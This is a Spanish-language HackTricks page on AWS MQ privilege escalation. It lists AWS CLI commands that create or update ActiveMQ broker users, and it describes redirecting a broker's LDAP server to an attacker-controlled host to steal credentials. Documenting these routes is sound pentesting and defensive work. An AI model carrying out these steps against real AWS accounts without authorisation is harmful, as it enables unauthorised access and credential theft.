AWS - MQ Privesc

Aprende hacking en AWS desde cero hasta experto con htARTE (Experto en Red Team de HackTricks en AWS)!

Otras formas de apoyar a HackTricks:

MQ

Para obtener más información sobre MQ, consulta:

pageAWS - MQ Enum

mq:ListBrokers, mq:CreateUser

Con esos permisos puedes crear un nuevo usuario en un broker de ActimeMQ (esto no funciona en RabbitMQ):

aws mq list-brokers
aws mq create-user --broker-id <value> --console-access --password <value> --username <value>

Impacto potencial: Acceder a información sensible navegando a través de ActiveMQ

mq:ListBrokers, mq:ListUsers, mq:UpdateUser

Con esos permisos puedes crear un nuevo usuario en un broker de ActiveMQ (esto no funciona en RabbitMQ):

aws mq list-brokers
aws mq list-users --broker-id <value>
aws mq update-user --broker-id <value> --console-access --password <value> --username <value>

Impacto Potencial: Acceder a información sensible navegando a través de ActiveMQ

mq:ListBrokers, mq:UpdateBroker

Si un broker está utilizando LDAP para autorización con ActiveMQ. Es posible cambiar la configuración del servidor LDAP utilizado a uno controlado por el atacante. De esta manera, el atacante podrá robar todas las credenciales que se envían a través de LDAP.

aws mq list-brokers
aws mq update-broker --broker-id <value> --ldap-server-metadata=...

Si de alguna manera logras encontrar las credenciales originales utilizadas por ActiveMQ podrías realizar un ataque de MitM, robar las credenciales, usarlas en el servidor original y enviar la respuesta (quizás simplemente reutilizando las credenciales robadas podrías hacer esto).

Impacto Potencial: Robar credenciales de ActiveMQ

Aprende hacking en AWS desde cero hasta experto con htARTE (HackTricks AWS Red Team Expert)!

Otras formas de apoyar a HackTricks:

Última actualización